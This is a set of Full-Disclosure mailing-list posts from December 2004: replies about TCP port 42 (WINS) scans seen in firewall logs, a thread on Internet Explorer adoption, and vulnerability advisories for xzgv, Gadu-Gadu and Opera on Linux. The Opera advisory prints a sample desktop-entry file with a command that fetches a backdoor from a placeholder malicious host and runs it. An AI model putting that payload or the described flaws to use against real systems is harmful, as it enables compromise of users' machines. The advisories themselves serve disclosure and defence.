SRC=131.252.116.141 DST=10.1.200.10 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Web > netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.7 > LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP > SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 > 06:41:49 gateway kernel: X12 drops:IN=br0 OUT=br0 PHYSIN=eth1 > PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.14 LEN=40 > TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Web > netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.2 > LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP > SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 > 06:41:49 gateway kernel: Htpedi drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.17 > LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Edirecall > drops:IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth0 > SRC=131.252.116.141 DST=10.1.20.12 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 > > > > James Lay > Network Manager/Security Officer > AmeriBen Solutions/IEC Group > Deo Gloria!!! > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > --- > Incoming mail is certified Virus Free. > Checked by AVG anti-virus system (http://www.grisoft.com). > Version: 6.0.808 / Virus Database: 550 - Release Date: 12/8/2004 > > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] TCP Port 42 port scans? What the heck over...
On Mon, 13 Dec 2004 06:46:38 -0700, James Lay <[EMAIL PROTECTED]> wrote: > Here they be. ODD. http://support.microsoft.com/kb/890710 yay google. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] HOW TO BREAK XP SP2 POPUP BLOCKER: kick it in the nut !
I'd speculate for several reasons. I've actually heard it said in my organization that people don't want to use Firefox, because certain sites don't display properly or at all with it. Even after being told there is an extension to view a page in IE, they still use that argument... [EMAIL PROTECTED] wrote: On Fri, 10 Dec 2004 23:42:07 EST, Scott Renna said: Beautiful...how many more fun ones like these until people start to migrate away from IE. If the stuff in the past hasn't already urged them to migrate, why should a small thing like being able to beat the popup blocker make them move? I'd put a smiley on that, but it's a serious question - you need to understand why they haven't *already* moved before you can even think about getting them to migrate. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] TCP Port 42 port scans? What the heck over...
http://isc.sans.org/port_details.php?port=42&repax=1&tarax=2&srcax=2&percent=N&days=70&Redraw= Shows a fairly large spike over the weekend. 42 is used for WINS (MS's netbios name server) replication, and recently the Immunitysec folks found an exploitable bug in the WINS service. Still, given how few people one would expect to have that port accessible through a firewall, or just how low the percentage of windows servers running WINS is, it is somewhat of a strange target if it is indeed an attempted WINS exploit. Matt On Mon, 13 Dec 2004 06:46:38 -0700, James Lay <[EMAIL PROTECTED]> wrote: > Here they be. ODD. Anyone else seeing this? > > Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.1 LEN=40 TOS=0x00 > PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 > Dec 13 06:41:49 gateway kernel: Web1 drops:IN=br0 OUT=br0 PHYSIN=eth1 > PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.18.1 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN > URGP=0 > Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.4 LEN=40 TOS=0x00 > PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 > Dec 13 06:41:49 workbox kernel: IN=eth0 OUT= > MAC=00:60:97:a5:76:36:00:10:7b:90:bc:30:08:00 SRC=131.252.116.141 > DST=10.1.200.10 LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP > SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 > Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.7 LEN=40 TOS=0x00 > PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 > Dec 13 06:41:49 gateway kernel: X12 drops:IN=br0 OUT=br0 PHYSIN=eth1 > PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.14 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN > URGP=0 > Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.2 LEN=40 TOS=0x00 > PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 > Dec 13 06:41:49 gateway kernel: Htpedi drops:IN=br0 OUT=br0 PHYSIN=eth1 > PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.17 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN > URGP=0 > Dec 13 06:41:49 gateway kernel: Edirecall drops:IN=br0 OUT=br0 PHYSIN=eth1 > PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.12 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN > URGP=0 > > James Lay > Network Manager/Security Officer > AmeriBen Solutions/IEC Group > Deo Gloria!!! > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] TCP Port 42 port scans? What the heck over...
Hi James, I see the same thing here, this IP scanned 3 of our networks (see attached log file). TCP ID is always 57370 Source port : 6000 Dest port : 42 Nothing is running on tcp port 42 here. I'd be interested in knowing what it is too, I'll open a netcat listener at my home and let you know if I catch anything. I also sent a notice to 131.252.0.0/16 tech handle in ARIN's database. Seems many other networks were hit byt this IP : http://www.mynetwatchman.com/LID.asp?IID=140488860 Have a nice day Maxime Ducharme Programmeur / Spécialiste en sécurité réseau - Original Message - From: "James Lay" <[EMAIL PROTECTED]> To: "Full-Disclosure (E-mail)" <[EMAIL PROTECTED]> Sent: Monday, December 13, 2004 8:46 AM Subject: [Full-Disclosure] TCP Port 42 port scans? What the heck over... > Here they be. ODD. Anyone else seeing this? > > Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.1 LEN=40 TOS=0x00 > PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 > Dec 13 06:41:49 gateway kernel: Web1 drops:IN=br0 OUT=br0 PHYSIN=eth1 > PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.18.1 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN > URGP=0 > Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.4 LEN=40 TOS=0x00 > PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 > Dec 13 06:41:49 workbox kernel: IN=eth0 OUT= > MAC=00:60:97:a5:76:36:00:10:7b:90:bc:30:08:00 SRC=131.252.116.141 > DST=10.1.200.10 LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP > SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 > Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.7 LEN=40 TOS=0x00 > PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 > Dec 13 06:41:49 gateway kernel: X12 drops:IN=br0 OUT=br0 PHYSIN=eth1 > PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.14 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN > URGP=0 > Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.2 LEN=40 TOS=0x00 > PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 > Dec 13 06:41:49 gateway kernel: Htpedi drops:IN=br0 OUT=br0 PHYSIN=eth1 > PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.17 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN > URGP=0 > Dec 13 06:41:49 gateway kernel: Edirecall drops:IN=br0 OUT=br0 PHYSIN=eth1 > PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.12 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN > URGP=0 > > > > James Lay > Network Manager/Security Officer > AmeriBen Solutions/IEC Group > Deo Gloria!!! > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > tcp42.log Description: Binary data ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] iDEFENSE Security Advisory 12.13.04: Multiple Vendor xzgv PRF Parsing Integer Overflow Vulnerability
Multiple Vendor xzgv PRF Parsing Integer Overflow Vulnerability iDEFENSE Security Advisory 12.13.04 http://www.idefense.com/application/poi/display?type=vulnerabilities December 13, 2004 I. BACKGROUND xzgv is a picture viewer for X, with a thumbnail-based file selector. It uses GTK+ and Imlib 1.x. Most file formats are supported, and the thumbnails used are compatible with xv, zgv and the Gimp. II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in various vendors' implementations of the read_prf_file method in the xzgv program could allow for arbitrary code execution. The vulnerability specifically exists due to an integer overflow while allocating memory for an image file. The vulnerable code is as follows: xzgv-0.8/src/readprf.c: if((*theimageptr=malloc(width*height*3))==NULL) [...] The values width and height are integers that are ultimately supplied by the image file. With certain values for height and width set in an image file, not enough memory is allocated due to an integer overflow. The underallocated memory is later written to, causing heap corruption and possible arbitrary code execution with the privileges of the user viewing the image file. III. ANALYSIS Exploitation allows attackers to gain the privileges of the user viewing the image file. If a user can be convinced to view a malicious file, this vulnerability can be exploited remotely. IV. DETECTION The following vendors have confirmed the availability of susceptible xzgv packages within their respective operating system distributions: SuSE Debian Gentoo FreeBSD V. WORKAROUND Only accept image files from trusted sources. Use a different image viewer program to view untrusted images. VI. VENDOR RESPONSE The vulnerability has been addressed in the following patch: http://rus.members.beeb.net/xzgv-0.8-integer-overflow-fix.diff VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2004-0994 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/05/2004 Initial vendor notification 12/10/2004 Secondary vendor notification 12/10/2004 Initial vendor response 12/13/2004 Coordinated public disclosure IX. CREDIT Infamous41md is credited with this discovery. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp X. LEGAL NOTICES Copyright (c) 2004 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ZH2004-19SA]Possible execution of remote shell commands in Opera with kfmclient
Author: Giovanni Delvecchio e-mail: [EMAIL PROTECTED] Tested version: Opera 7.54 linux version with Kde 3.2.3 Original advisory: http://zone-h.org/en/advisories/read/id=6503/ Problem: === Opera for linux uses "kfmclient exec" as "Default Application" to handle saved files. This could be used by malicious remote users to execute arbitrary shell commands on a target system. Indeed, the command "kfmclient exec" could be used to open a "Kde Desktop Entry" and therefore execute the command within the "Exec=" entry. Example of [KDE Desktop Entry]: # KDE Config File [KDE Desktop Entry] SwallowExec= SwallowTitle= BinaryPattern= MimeType= Exec="Any arbitrary command" Icon= TerminalOptions= Path= Type=Application Terminal=0 __ Possible method of Exploitation = This method of exploitation needs that a particular file name extension is used. If page.Htm is used as file name and "kfmclient exec page.Htm" is opened , the command in "Exec=" entry will be executed. Instead, If "page.htm" is used as file name, it will not be opened like a "kde desktop entry" but it will be viewed in konqueror. It works also with Jpg,Gif etc.. , but not with jpg,gif..extension, since the "system" is case sensitive. Attack scenario: 1- A user clicks on a link which requires http://malicious_server/image.Jpg 2- malicious_server responds with an unknown Content-Type field , for example Content-Type: image/Jpeg. (note the dot at the end), so Opera will show a dialog window. 3- if a user chooses "Open" to view image.Jpg, it will be opened by "kfmclient exec" command, since kfmclient is the "Default Application" 4- Image.Jpg is a kde desktop entry : image.Jpg-- # KDE Config File [KDE Desktop Entry] SwallowExec= SwallowTitle= BinaryPattern= MimeType= Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor Icon= TerminalOptions= Path= Type=Application Terminal=0 end of image.Jpg--- Note: \t is an horizontal tab. In this case a backdoor will be downloaded on victim's computer and executed. Solution: Disable "kfmclient exec" as default application _ Ricerche online più semplici e veloci con MSN Toolbar! http://toolbar.msn.it/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] HOW TO BREAK XP SP2 POPUP BLOCKER: kick it in the nut !
On Fri, 10 Dec 2004 23:42:07 EST, Scott Renna said: > Beautiful...how many more fun ones like these until people start to > migrate away from IE. If the stuff in the past hasn't already urged them to migrate, why should a small thing like being able to beat the popup blocker make them move? I'd put a smiley on that, but it's a serious question - you need to understand why they haven't *already* moved before you can even think about getting them to migrate. pgpUA8EVEkN8M.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Gadu-Gadu several vulnerabilities
Product:Gadu-Gadu, most of all available versions (including the latest one) Vendor: SMS-EXPRESS.COM (http://www.gadu-gadu.pl) Impact: Several vulnerabilities within application allow for remote execution of arbitrary code and information stealing Severity: Critical Authors:Blazej Miga <[EMAIL PROTECTED]>, Jaroslaw Sajko <[EMAIL PROTECTED]> Advisory: http://www.man.poznan.pl/~security/gg-adv.txt [ISSUE] Gadu-Gadu is the first Polish instant messenger used by ca. 3 millions of people per month. Several vulnerabilities were discovered ranging from heap and stack overflows, integer overflows and directory traversal to incorrect filtering of html script code. These vulnerabilities can lead to remote execution of arbitrary code, stealing of user data (contact list, password, etc...) or application crash. All of these vulnerabilities can be exploited on a default configuration of Gadu-Gadu application. [DETAILS] Bug 1. There is a parsing error in the code portion responsible for the analysis of 'http:' and 'news:' hrefs embedded in sent messages. This bug can be exploited to inject '' tag with code or a reference to it into HTML code displayed by the application.. The attacker can send malicious code or reference to a file with code (see Feature 0 described below). If properly exploited, code will be executed when the window with message pops up. Code will execute in LOCAL ZONE! Bug 2. Some strange kind of feature. Gadu-gadu client allows users to connect to the server via http proxy, but beacause there is no server authentication any proxy server can send any packet. This combined with a Feature 1 (described below) allows for the remote code execution for http proxy administrators or other men in the middle attacks. All WITHOUT user knowledge! Bug 3. Exploitnig the dcc connections feature (Feature 2) and the ctcp packets (ctcp with special values, 1 as type and 4 as subtype you can get file from _cache directory of your friend, without his knowledge! But, beacause there is directory traversal error you can get any file, ie. '..\Ja\config.dat' where the password is stored. User is NOT notified about that by gadu-gadu application. Bug 4. There is a buffer overflow in the code portion handling sending of images. This is a stack overflow which can be triggered by a specially crafted filename. Successfull exploitation can lead to stack frame overwrite and arbitrary code execution. This bug works with the newest build of the program. Bug 4b. In addition there is also a heap overflow. This bug is probably the same as the one found by Lord YuP in September this year, but it still works with the newest program build! Bug 5. There is some kind of bug while reading the config file. Even if the "image send" option is disabled (by default it is) you can still send small images, up to 100 bytes. This bug combined with bug number 4 allows the attacker to send malicious packet with arbitrary code to any user who have the attacker's uin on his contact list (even to the users who have "image send" option disabled). Bug 6. Another vulnerability related to image sending rely on fact that image can be divided into packets and sent one by one, but code responsible for assembling files do the strange comparision. If the length of received data is not equal to the expected length of file to receive, the receive loop is not terminated. Attacker has full control over the length values as they are retrieved directly from the received packets. So there is another heap overflow, maybe this is that bug which Lord YuP found, who knows, but beacause the file can be long, there is a lot of space for the shellcode. This bug works with the newest version. Bug 7. There is also an integer overflow vulnerability which can be triggered in a code portion responsible for the file receival through dcc. It is caused by the fact that file length is fetched directly from the user packet and it is compared to some maxlen value with use of "JLE instruction". Because this time file is written block by block this bug can lead only (according to our knowledge) to filling up the diskspace with unknown data from memory or to writing small unknown part of memory (which can be further fetched with bug number 3). Again, all data about lengths come from sender packets. Feature 0. When filename parser meets '.' or '/' whithin filename it purges it, but it does not do so when it meets '/' (which stands for '/') or '.' (which stands for '.'). Feature 1. The server can send specially crafted packet to a client with a dll file inside it and the client will execute certain function from that library, without user knowledge. Feature 2. When p2p connectinos are enabled, one side of a connection can ask the other one to connect to a given ip and port. This can be also exploited without user knowledge. [POC] Although we have working (win2k, winx
RE: [Full-Disclosure] TCP Port 42 port scans? What the heck over...
Could perhaps be the beginning of a worm/cracker searching for the WINS vulnerability. http://www.securityfocus.com/archive/1/382414 Patrick Dolan Information Security Analyst -Original Message- From: James Lay [mailto:[EMAIL PROTECTED] Sent: Monday, December 13, 2004 7:47 AM To: Full-Disclosure (E-mail) Subject: [Full-Disclosure] TCP Port 42 port scans? What the heck over... Here they be. ODD. Anyone else seeing this? Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.1 LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Web1 drops:IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.18.1 LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.4 LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 06:41:49 workbox kernel: IN=eth0 OUT= MAC=00:60:97:a5:76:36:00:10:7b:90:bc:30:08:00 SRC=131.252.116.141 DST=10.1.200.10 LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.7 LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: X12 drops:IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.14 LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.2 LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Htpedi drops:IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.17 LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Edirecall drops:IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.12 LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 James Lay Network Manager/Security Officer AmeriBen Solutions/IEC Group Deo Gloria!!! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Disclaimer: This electronic message, including any attachments, is confidential and intended solely for use of the intended recipient(s). This message may contain information that is privileged or otherwise protected from disclosure by applicable law. Any unauthorized disclosure, dissemination, use or reproduction is strictly prohibited. If you have received this message in error, please delete it and notify the sender immediately. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html